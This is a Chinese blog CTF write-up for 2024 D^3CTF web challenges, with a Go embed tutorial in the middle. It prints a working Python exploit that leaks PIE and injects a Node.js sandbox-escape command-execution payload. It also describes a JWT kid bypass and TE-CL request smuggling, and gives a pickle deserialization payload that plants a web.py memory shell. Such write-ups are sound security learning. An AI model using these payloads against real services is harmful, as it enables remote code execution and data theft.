<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="John Doe" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      2024-D3CTF-WP and Review 
      
      
      |
    
     1cfh&#39;Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/hacker.jpg">
    <link rel="icon" href="/images/hacker.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.0.0"><link rel="alternate" href="/atom.xml" title="1cfh'Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/tou.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/"></a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">2024-D3CTF-WP and Review</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2024-06-08 14:11:26
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/WriteUp/" title="WriteUp">
                    #WriteUp
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="2024-D-3CTF-Web-WP和复现"><a href="#2024-D-3CTF-Web-WP和复现" class="headerlink" title="2024-D^3CTF-Web-WP和复现"></a>2024-D^3CTF-Web-WP和复现</h1><h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Stack-Overflow"><a href="#Stack-Overflow" class="headerlink" title="Stack-Overflow"></a>Stack-Overflow</h3><p>大致流程就是通过栈溢出将PIE write到stdout从而泄露PIE，然后通过溢出执行read覆盖cmd，从而实现RCE</p>
<p>这题附件和远端环境还不一样，真搞人。。。</p>
<p>EXP如下，最后直接访问index.html就好了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://106.14.121.29:32149&quot;</span></span><br><span class="line"><span class="comment">#url = &quot;http://127.0.0.1&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># read the pie</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">readThePIE</span>():</span><br><span class="line">    s = requests.session()</span><br><span class="line"></span><br><span class="line">    exploit = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">        exploit.append(<span class="built_in">str</span>(i))</span><br><span class="line">    exploit.append(<span class="string">&quot;28&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;[[ 0 ]]&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;stdin&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;read&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;1111111&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;222222&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;63&quot;</span>)            <span class="comment"># 通过溢出覆盖write的参数实现越界读</span></span><br><span class="line"></span><br><span class="line">    jsondata = &#123;</span><br><span class="line">        <span class="string">&quot;stdin&quot;</span>: exploit</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    resp1 = s.post(url=url, json=jsondata)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;PIE: <span class="subst">&#123;<span class="built_in">int</span>(resp1.content.decode()[<span class="number">36</span>:<span class="number">46</span>]) - <span class="number">24</span>&#125;</span>&quot;</span>)</span><br><span class="line">    s.close()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">int</span>(resp1.content.decode()[<span class="number">36</span>:<span class="number">46</span>]) - <span class="number">24</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">writeCmd</span>(<span class="params">pie</span>):</span><br><span class="line">    s = requests.session()</span><br><span class="line">    exploit = []</span><br><span class="line">    </span><br><span class="line">    payload2 = <span class="string">&#x27;const process = this.constructor.constructor(&quot;return this.process&quot;)();process.mainModule.require(&quot;child_process&quot;).execSync(&quot;cat /flag &gt; /app/index.html&quot;).toString()&#x27;</span></span><br><span class="line"></span><br><span class="line">    exploit.append(<span class="string">&quot;(function (...a)&#123; console.log(\&quot;hack\&quot;);&quot;</span> + payload2 + <span class="string">&quot;;return a.map(s=&gt;console.log(s)).join(\&quot; \&quot;); &#125;)&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">19</span>):</span><br><span class="line">        exploit.append(<span class="built_in">str</span>(i))</span><br><span class="line">    </span><br><span class="line">    exploit.append(<span class="string">&quot;28&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">f&quot;<span class="subst">&#123;pie&#125;</span>&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;stdin&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;read&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;1&quot;</span>)      <span class="comment"># size</span></span><br><span class="line">    exploit.append(<span class="string">f&quot;<span class="subst">&#123;pie+<span class="number">42</span>&#125;</span>&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;stdin&quot;</span>)</span><br><span class="line">    exploit.append(<span class="string">&quot;read&quot;</span>)</span><br><span class="line">    </span><br><span class="line">    jsondata = &#123;</span><br><span class="line">        <span class="string">&quot;stdin&quot;</span>: exploit</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    resp1 = s.post(url=url, json=jsondata)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(resp1.content)</span><br><span class="line">    s.close()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    pie = readThePIE()</span><br><span class="line">    writeCmd(pie)</span><br></pre></td></tr></table></figure>



<h3 id="doctor（复现）"><a href="#doctor（复现）" class="headerlink" title="doctor（复现）"></a>doctor（复现）</h3><h4 id="新知识点"><a href="#新知识点" class="headerlink" title="新知识点"></a>新知识点</h4><ul>
<li>go embed</li>
</ul>
<p>参考：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/351931501">https://zhuanlan.zhihu.com/p/351931501</a></p>
<p>这是go1.16中引入的新特性，通过<code>//go:embed</code>指令，可以在编译阶段将静态资源文件打包进编译好的程序中，并提供访问这些文件的能力</p>
<p>例如：</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//go:embed dist/*</span></span><br><span class="line"><span class="keyword">var</span> f embed.FS</span><br><span class="line"></span><br><span class="line"><span class="comment">//go:embed dist/index.html</span></span><br><span class="line"><span class="keyword">var</span> html <span class="type">string</span></span><br></pre></td></tr></table></figure>

<p>作用：将静态资源打包入二进制程序，防止静态资源丢失以影响程序执行，常用于Go模板、静态web服务、数据库迁移等</p>
<p>使用：</p>
<p>在embed中，可以将静态资源文件嵌入到三种类型的变量中，分别为字符串、字节数组、<code>embed.FS</code>文件类型中</p>
<ul>
<li>读取文件到字符串中</li>
</ul>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	_ <span class="string">&quot;embed&quot;</span></span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">//go:embed version.txt</span></span><br><span class="line"><span class="keyword">var</span> version <span class="type">string</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	fmt.Println(version)</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>读取文件到字节数组中</li>
</ul>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">    _ <span class="string">&quot;embed&quot;</span></span><br><span class="line">    <span class="string">&quot;fmt&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">//go:embed version.txt</span></span><br><span class="line"><span class="keyword">var</span> versionByte []<span class="type">byte</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">    fmt.Printf(<span class="string">&quot;version %q\n&quot;</span>, <span class="type">string</span>(versionByte))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>使用<code>embed.FS</code>管理目录</p>
<p>这里主要涉及三种方法</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Open 打开要读取的文件，并返回文件的fs.File结构.</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(f FS)</span></span> Open(name <span class="type">string</span>) (fs.File, <span class="type">error</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// ReadDir 读取并返回整个命名目录</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(f FS)</span></span> ReadDir(name <span class="type">string</span>) ([]fs.DirEntry, <span class="type">error</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// ReadFile 读取并返回name文件的内容.</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(f FS)</span></span> ReadFile(name <span class="type">string</span>) ([]<span class="type">byte</span>, <span class="type">error</span>)</span><br></pre></td></tr></table></figure>

<p>一个用于展示static目录的demo</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;embed&quot;</span></span><br><span class="line">	_ <span class="string">&quot;embed&quot;</span></span><br><span class="line">	<span class="string">&quot;io/fs&quot;</span></span><br><span class="line">	<span class="string">&quot;log&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">	<span class="string">&quot;os&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	useOS := <span class="built_in">len</span>(os.Args) &gt; <span class="number">1</span> &amp;&amp; os.Args[<span class="number">1</span>] == <span class="string">&quot;live&quot;</span></span><br><span class="line">	http.Handle(<span class="string">&quot;/&quot;</span>, http.FileServer(getFileSystem(useOS)))</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8888&quot;</span>, <span class="literal">nil</span>)</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//go:embed static</span></span><br><span class="line"><span class="keyword">var</span> embedFiles embed.FS</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">getFileSystem</span><span class="params">(useOS <span class="type">bool</span>)</span></span> http.FileSystem &#123;</span><br><span class="line">	<span class="keyword">if</span> useOS &#123;		<span class="comment">// live模式类似于hot-deploy, 直接读取宿主机环境上的static目录进行显示</span></span><br><span class="line">		log.Print(<span class="string">&quot;using live mode&quot;</span>)</span><br><span class="line">		<span class="keyword">return</span> http.FS(os.DirFS(<span class="string">&quot;static&quot;</span>))</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	log.Print(<span class="string">&quot;using embed mode&quot;</span>)</span><br><span class="line">	</span><br><span class="line">    <span class="comment">// 直接使用打包进二进制程序的static目录</span></span><br><span class="line">	fsys, err := fs.Sub(embedFiles, <span class="string">&quot;static&quot;</span>)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		<span class="built_in">panic</span>(err)</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> http.FS(fsys)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="d3pythonhttp（复现）"><a href="#d3pythonhttp（复现）" class="headerlink" title="d3pythonhttp（复现）"></a>d3pythonhttp（复现）</h3><p>考点：JWT鉴权绕过、请求走私、pickle反序列化</p>
<h4 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h4><p>鉴权依靠jwt，在<code>/login</code>路由下生成jwt的token，在<code>/admin</code>路由下进行<code>verify_token</code></p>
<p>一开始想着怎么进行<code>fronted_key</code>泄露，其实这是一个逻辑洞的绕过</p>
<p>根据JWT的结构，头部部分可以进行伪造，而key的获取是依靠于头部中的kid字段来确定的，即我们可以随便指定一个路径使得get_key触发异常直接pass，然后返回空</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021807430.png" alt="image-20240502145337969"></p>
<h4 id="走私绕过"><a href="#走私绕过" class="headerlink" title="走私绕过"></a>走私绕过</h4><p>前后端中对于<code>Backdoor..</code>字符串的处理不同，我们需要利用前端和后端对于TE的解析差异进行走私</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021807105.png" alt="image-20240502163953630"></p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021807442.png" alt="image-20240502163920761"></p>
<p>对于TE头的具体解析差异如下：</p>
<p>前端全转小写</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021807391.png" alt="image-20240502164207102"></p>
<p>后端对大小写敏感</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021807852.png" alt="image-20240502164232879"></p>
<p>也就是说，我们可以使用大小写使得TE头在前端成功解析，但是在后端使用CL解析，即TE-CL走私</p>
<ul>
<li>关于TE头</li>
</ul>
<p>设置了 <code>Transfer-Encoding: chunked</code> 后，请求主体按一系列块的形式发送，并将省略 <code>Content-Length</code>。在每个块的开头需要用十六进制数指明当前块的长度，数值后接 <code>\r\n</code>（占 2 字节），然后是块的内容，再接 <code>\r\n</code> 表示此块结束。最后用长度为 0 的块表示终止块。终止块后是一个 trailer，由 0 或多个实体头组成，可以用来存放对数据的数字签名等。</p>
<p>格式如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[chunk size][\r\n][chunk data][\r\n][chunk size][\r\n][chunk data][\r\n][chunk size = 0][\r\n][\r\n]</span><br></pre></td></tr></table></figure>

<p>例子：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>1.com</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Transfer-Encoding</span><span class="punctuation">: </span>chunked</span><br><span class="line"></span><br><span class="line"><span class="language-stylus"><span class="selector-tag">b</span></span></span><br><span class="line"><span class="language-stylus">q=smuggling</span></span><br><span class="line"><span class="language-stylus"><span class="number">6</span></span></span><br><span class="line"><span class="language-stylus">hahaha</span></span><br><span class="line"><span class="language-stylus"><span class="number">0</span></span></span><br><span class="line"><span class="language-stylus"><span class="selector-attr">[空白行]</span></span></span><br><span class="line"><span class="language-stylus"><span class="selector-attr">[空白行]</span></span></span><br></pre></td></tr></table></figure>

<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1\r\nHost: 1.com\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\n\r\nb\r\nq=smuggling\r\n6\r\nhahaha\r\n0\r\n\r\n</span><br></pre></td></tr></table></figure>



<h4 id="webpy下的内存马"><a href="#webpy下的内存马" class="headerlink" title="webpy下的内存马"></a>webpy下的内存马</h4><p>算是第一次碰到这个框架</p>
<p>查看源码，可以发现有<code>processors</code>的变量，类似于一个<code>filter</code>的用法</p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021653498.png" alt="image-20240502164858824"></p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021653263.png" alt="image-20240502165248494"></p>
<p><img src="https://icfh-imgs-1313391192.cos.ap-nanjing.myqcloud.com/images/202405021653911.png" alt="image-20240502165332488"></p>
<p>生成opcode，添加一个Processor进去</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">exploit</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">eval</span>, (<span class="string">&quot;app.add_processor((lambda self : __import__(&#x27;os&#x27;).popen(&#x27;cat /home/ctf/flag&#x27;).read()))&quot;</span>,)</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line">exp = exploit()</span><br><span class="line">exp_str = pickle.dumps(exp, protocol=<span class="number">0</span>)</span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(exp_str))</span><br></pre></td></tr></table></figure>



<h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h4><p>感觉使用bp很容易出问题，所以想方设法使用脚本发包</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>





<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=Mzg4MTg1MDY4MQ==&mid=2247485683&idx=1&sn=59a3ab77c368f4a06173f06ba6acc8f4&chksm=cf5ee8a5f82961b3369d0442ef2b09e0c09133192349b7d76f1c829458cb0c66aed0723b4a40&mpshare=1&scene=23&srcid=05027by9GN73PBRo2Fb8sIO9&sharer_shareinfo=e4946fbe5ac0cfc0ad85a20ab1ae04a3&sharer_shareinfo_first=e4946fbe5ac0cfc0ad85a20ab1ae04a3#rd">https://mp.weixin.qq.com/s?__biz=Mzg4MTg1MDY4MQ==&amp;mid=2247485683&amp;idx=1&amp;sn=59a3ab77c368f4a06173f06ba6acc8f4&amp;chksm=cf5ee8a5f82961b3369d0442ef2b09e0c09133192349b7d76f1c829458cb0c66aed0723b4a40&amp;mpshare=1&amp;scene=23&amp;srcid=05027by9GN73PBRo2Fb8sIO9&amp;sharer_shareinfo=e4946fbe5ac0cfc0ad85a20ab1ae04a3&amp;sharer_shareinfo_first=e4946fbe5ac0cfc0ad85a20ab1ae04a3#rd</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2024/05/01/StaticAnalysis/NJU-Static-Analysis-Data-Flow-Analysis-2/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2024-06-08 14:11:26
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/WriteUp/" title="WriteUp">
                        #WriteUp
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2024/05/02/DevOps/wsl-path-manage/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2024-D-3CTF-Web-WP%E5%92%8C%E5%A4%8D%E7%8E%B0"><span class="toc-text">2024-D^3CTF-Web-WP和复现</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Stack-Overflow"><span class="toc-text">Stack-Overflow</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#doctor%EF%BC%88%E5%A4%8D%E7%8E%B0%EF%BC%89"><span class="toc-text">doctor（复现）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B0%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-text">新知识点</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#d3pythonhttp%EF%BC%88%E5%A4%8D%E7%8E%B0%EF%BC%89"><span class="toc-text">d3pythonhttp（复现）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-text">代码审计</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%B5%B0%E7%A7%81%E7%BB%95%E8%BF%87"><span class="toc-text">走私绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#webpy%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-text">webpy下的内存马</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#EXP"><span class="toc-text">EXP</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-text">参考</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/1cfh">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
              <a title="rss" href="/atom.xml">
                <i class="iconfont icon-rss"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2025 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
    <div class="footer-views">
      
          本站总访问量<span id="busuanzi_value_site_pv"></span>次
        
      
          本文总阅读量<span id="busuanzi_value_page_pv"></span>次
        
      
          本站访客数<span id="busuanzi_value_site_uv"></span>人
        
      
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

